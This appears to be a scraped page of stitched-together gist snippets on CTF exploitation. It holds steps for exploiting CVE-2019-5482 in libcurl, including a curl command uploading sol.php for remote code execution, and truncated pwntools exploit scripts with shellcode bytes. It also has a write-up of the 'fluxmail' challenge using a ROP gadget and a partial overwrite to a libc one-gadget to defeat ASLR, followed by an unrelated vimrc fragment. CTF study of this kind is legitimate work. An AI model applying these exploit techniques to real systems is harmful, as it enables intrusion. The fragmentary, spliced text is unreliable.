- Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
- Update ip addresses at the source files
- Launch
srv.py
on the server - Upload
sol.php
via curl:curl http://$URL:$PORT/ -d 'rce@sol.php'
#!/usr/bin/python | |
import os | |
import socket | |
import struct | |
from time import sleep | |
from pwn import * | |
bind_ip = '0.0.0.0' |
#!/usr/bin/python | |
import re | |
import os | |
import sys | |
import socket | |
import threading | |
from time import sleep | |
from pwn import * |
#!/usr/bin/env python | |
from pwn import * | |
context(os='linux', arch='amd64') | |
BINARY = './hq2017_task6_m116' | |
def generate_shellcode(): | |
c1 = '\x6a\x68\x90\xbaAAAA' |
The service fluxmail
is a binary service that works as a systemd socket, and thus, can be launched from a command line for testing. After the launch, the main process starts a child process and communicates with child via pipes. Parent process interprets commands from user, sends messages to the pipe, and then child process executes the commands and communicates the result back to parent, so parent would be able to print it. All required information is stored in a data
folder, so it can be reused later.
After reading the initial bits I realized:
- The bug is probably logical. It would be very hard exploit an overflow bug in the PIE binary.
- It is very strange that data processing is moved to a child process? Why? May be we could inject somehow in the protocol (didn't work out for me)
There are several files, which contain user information:
By using the so called universal gadget from __libc_csu_init
we can read shellcode into the rwx memory segment and return into it.
By executing read function we can overwrite only last two bytes of read to find something useful and defeat ASLR. Fortunately there is one-gadget RCE located at 0xf0567
in this version of libc, right near the read
function (0xf6670). We overflow only last two bytes to defeat ASLR, so that only around 16 attemps needed, because of 4 bit entropy of ASLR.
EDIT: checkout another great solution proposed by agadeint in the comment section below, which is cleaner and does not require bruteforcing and one gadget.
" Line numeration | |
set noeb | |
set nu | |
" Use Vim settings, rather then Vi settings (much better!). | |
set nocompatible | |
" Turn on the verboseness to see everything vim is doing. | |
"set verbose=9 |